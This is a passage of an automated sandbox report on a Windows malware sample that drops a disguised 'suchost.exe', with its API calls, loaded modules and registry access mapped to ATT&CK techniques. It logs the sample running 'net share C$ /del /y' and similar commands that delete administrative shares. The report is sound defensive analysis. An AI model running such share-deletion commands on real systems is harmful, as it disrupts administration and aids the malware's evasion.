(UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00001284)\n \"net1.exe\" called \"GetProcAddress\" with a parameter CscNetApiGetInterface (UID: 00000000-00001284)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"suchost.exe\" touched \"NetworkListManager\" (Path: \"HKCU\\CLSID\\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\")\n \"suchost.exe\" touched \"Network List Manager\" (Path: \"HKCU\\CLSID\\{A47979D2-C419-11D9-A5B4-001185AD2B89}\")\n \"suchost.exe\" touched \"PSFactoryBuffer\" (Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{1299CF18-C4F5-4B6A-BB0F-2299F0398E27}\")\n \"suchost.exe\" touched \"Internet Explorer(Ver 1.0)\" (Path: \"HKCU\\CLSID\\{0002DF01-0000-0000-C000-000000000046}\\TREATAS\")\n \"suchost.exe\" touched \"WebBrowserHandler Proxy\" (Path: \"HKCU\\CLSID\\{3CB169B3-17D9-4E47-8B93-2878998F69A2}\\TREATAS\")\n \"suchost.exe\" touched \"PSDispatch\" (Path: \"HKCU\\CLSID\\{00020420-0000-0000-C000-000000000046}\\TREATAS\")\n \"suchost.exe\" touched \"WinInetBroker Class\" (Path: \"HKCU\\CLSID\\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"14001500da596376@api-ms-win-downlevel-advapi32-l1-1-0.dll\"\n \"15001600c03ef76a@advapi32.dll\"\n \"0e000f00703ff76a@advapi32.dll\"\n \"0e000f00cc3ff76a@advapi32.dll\"\n \"11001200b447f76a@advapi32.dll\"\n \"110012004848f76a@advapi32.dll\"\n \"120013008c48f76a@advapi32.dll\"\n \"12001300e448f76a@advapi32.dll\"\n \"14001500386ef76a@advapi32.dll\"\n \"14001500506ef76a@advapi32.dll\"\n \"14001500686ef76a@advapi32.dll\"\n \"17001800806ef76a@advapi32.dll\"\n \"0d000e00986ef76a@advapi32.dll\"\n \"11001200a86ef76a@advapi32.dll\"\n \"11001200bc6ef76a@advapi32.dll\"\n \"0d000e004466f76a@WININET.dll\"\n \"0d000e00b466f76a@WININET.dll\"\n \"10001100ec66f76a@WININET.dll\"\n \"100011009067f76a@WININET.dll\"\n \"10001100006ff76a@WININET.dll\"\n \"10001100146ff76a@WININET.dll\"\n \"14001500286ff76a@WININET.dll\"\n \"14001500406ff76a@WININET.dll\"\n \"12001300586ff76a@WININET.dll\"\n \"120013006c6ff76a@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74f50000\n \"suchost.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70660000\n \"suchost.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"suchost.exe\" loaded module \"KERNEL32\" at base 75510000\n \"suchost.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"suchost.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ca00000\n \"suchost.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 70550000\n \"suchost.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-OLE32-L1-1-0.DLL\" at base 75250000\n \"suchost.exe\" loaded module \"WS2_32.DLL\" at base 76910000\n \"suchost.exe\" loaded module \"WINHTTP.DLL\" at base 71280000\n \"suchost.exe\" loaded module \"IPHLPAPI.DLL\" at base 733f0000\n \"suchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 74a70000\n \"suchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHIP6.DLL\" at base 74a60000\n \"suchost.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L2-1-0.DLL\" at base 72880000\n \"suchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NLAAPI.DLL\" at base 73760000\n \"suchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NAPINSP.DLL\" at base 730a0000\n \"suchost.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77360000\n \"suchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73e90000\n \"suchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PNRPNSP.DLL\" at base 73080000\n \"suchost.exe\" loaded module \"DNSAPI.DLL\" at base 74930000\n \"suchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WINRNR.DLL\" at base 73050000\n \"suchost.exe\" loaded module \"RPCRT4.DLL\" at base 76f90000\n \"suchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 73320000\n \"suchost.exe\" loaded module \"RASADHLP.DLL\" at base 71740000\n \"suchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 745d0000\n \"suchost.exe\" loaded module \"USER32.DLL\" at base 766a0000\n \"suchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\DRPROV.DLL\" at base 72860000\n \"suchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NTLANMAN.DLL\" at base 72730000\n \"suchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\DAVCLNT.DLL\" at base 72710000\n \"suchost.exe\" loaded module \"CSCAPI.DLL\" at base 6ffc0000\n \"suchost.exe\" loaded module \"SSPICLI.DLL\" at base 74f30000\n \"suchost.exe\" loaded module \"NETUTILS.DLL\" at base 737a0000\n \"suchost.exe\" loaded module \"WKSCLI.DLL\" at base 73790000\n \"suchost.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 77360000\n \"suchost.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L2-1-0.DLL\" at base 77360000\n \"suchost.exe\" loaded module \"SHLWAPI.DLL\" at base 767f0000\n \"suchost.exe\" loaded module \"ADVAPI32.DLL\" at base 76950000\n \"suchost.exe\" loaded module \"KERNEL32.DLL\" at base 75510000\n \"suchost.exe\" loaded module \"CRYPTSP.DLL\" at base 74ab0000\n \"suchost.exe\" loaded module \"CREDSSP.DLL\" at base 74770000\n \"suchost.exe\" loaded module \"URLMON.DLL\" at base 76b30000\n \"suchost.exe\" loaded module \"WININET.DLL\" at base 763e0000\n \"suchost.exe\" loaded module \"OLEAUT32.DLL\" at base 75470000\n \"suchost.exe\" loaded module \"DHCPCSVC6.DLL\" at base 732c0000\n \"suchost.exe\" loaded module \"DHCPCSVC.DLL\" at base 732a0000\n \"suchost.exe\" loaded module \"NTDLL.DLL\" at base 771a0000\n \"suchost.exe\" loaded module \"OLE32.DLL\" at base 77040000\n \"suchost.exe\" loaded module \"CRYPTBASE.DLL\" at base 74fa0000\n \"suchost.exe\" loaded module \"NSI.DLL\" at base 772f0000\n \"suchost.exe\" loaded module \"CFGMGR32.DLL\" at base 75360000\n \"suchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74f50000\n \"suchost.exe\" loaded module \"CLBCATQ.DLL\" at base 76a00000\n \"suchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NETPROFM.DLL\" at base 6d020000\n \"suchost.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77360000\n \"suchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74840000\n \"suchost.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 75040000\n \"suchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NPMPROXY.DLL\" at base 6c4c0000\n \"suchost.exe\" loaded module \"SECUR32.DLL\" at base 74dd0000\n \"suchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\OLEAUT32.DLL\" at base 75470000\n \"suchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WININET.DLL\" at base 763e0000\n \"suchost.exe\" loaded module \"%PROGRAMFILES%\\INTERNET EXPLORER\\IEPROXY.DLL\" at base 72770000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70660000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"cmd.exe\" loaded module \"KERNEL32\" at base 75510000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"cmd.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ca00000\n \"cmd.exe\" loaded module \"KERNEL32.DLL\" at base 75510000\n \"cmd.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74f50000\n \"net.exe\" loaded module \"GDI32.DLL\" at base 753e0000\n \"net.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 773d0000\n \"net.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70660000\n \"net.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"net.exe\" loaded module \"KERNEL32\" at base 75510000\n \"net.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"net.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ca00000\n \"net.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74f50000\n \"net1.exe\" loaded module \"NETMSG\" at base 72760000\n \"net1.exe\" loaded module \"GDI32.DLL\" at base 753e0000\n \"net1.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 773d0000\n \"net1.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70660000\n \"net1.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"net1.exe\" loaded module \"KERNEL32\" at base 75510000\n \"net1.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"net1.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ca00000\n \"net1.exe\" loaded module \"RPCRT4.DLL\" at base 76f90000\n \"net1.exe\" loaded module \"CSCAPI.DLL\" at base 6ffc0000\n \"net1.exe\" loaded module \"NETMSG\" at base 72750000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" called \"CreateProcessA\" with parameter \"%WINDIR%\\system32\\drivers\\suchost.exe\" - (UID: 00000000-00003536)\n \"suchost.exe\" called \"CreateProcessA\" with parameter \"cmd.exe /c net share Z$ /del /y\" - (UID: 00000000-00002084)\n \"suchost.exe\" called \"CreateProcessA\" with parameter \"cmd.exe /c net share C$ /del /y\" - (UID: 00000000-00002084)\n \"suchost.exe\" called \"CreateProcessA\" with parameter \"cmd.exe /c net share admin$ /del /y\" - (UID: 00000000-00002084)\n \"cmd.exe\" called \"CreateProcessW\" with parameter \"net share Z$ /del /y\" - (UID: 00000000-00003484)\n \"cmd.exe\" called \"CreateProcessW\" with parameter \"net share C$ /del /y\" - (UID: 00000000-00003548)\n \"cmd.exe\" called \"CreateProcessW\" with parameter \"net share admin$ /del /y\" - (UID: 00000000-00005192)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"setup.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"7zFM.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"7zG.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"Uninstall.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"suchost.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"DW20.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,add\tesp, -0x10,mov\teax, 0x426f24,call\t0x4065c4,call\t0x426ae4,call\t0x404478,mov\teax, eax,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,\"\n \"setup.exe\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,add\tesp, -0x10,mov\teax, 0x426f24,call\t0x4065c4,call\t0x426ae4,call\t0x404478,mov\teax, eax,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,\"\n \"7zFM.exe\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,add\tesp, -0x10,mov\teax, 0x426f24,call\t0x4065c4,call\t0x426ae4,call\t0x404478,mov\teax, eax,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,\"\n \"7zG.exe\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,add\tesp, -0x10,mov\teax, 0x426f24,call\t0x4065c4,call\t0x426ae4,call\t0x404478,mov\teax, eax,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,\"\n \"Uninstall.exe\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,add\tesp, -0x10,mov\teax, 0x426f24,call\t0x4065c4,call\t0x426ae4,call\t0x404478,mov\teax, eax,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,\"\n \"suchost.exe\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,add\tesp, -0x10,mov\teax, 0x426f24,call\t0x4065c4,call\t0x426ae4,call\t0x404478,mov\teax, eax,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,\"\n \"DW20.EXE\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,add\tesp, -0x10,mov\teax, 0x426f24,call\t0x4065c4,call\t0x426ae4,call\t0x404478,mov\teax, eax,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76F90000\n \"suchost.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76F90000\n \"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76F90000\n \"net.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76F90000\n \"net1.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76F90000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"suchost.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"suchost.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"net1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"net1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"net1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-70", "type": 6, "relevance": 10, "name": "Scanning for window names", "description": "\"suchost.exe\" searching for class \"msctls_statusbar32\"", "origin": "API Call", "attck_id": "T1010", 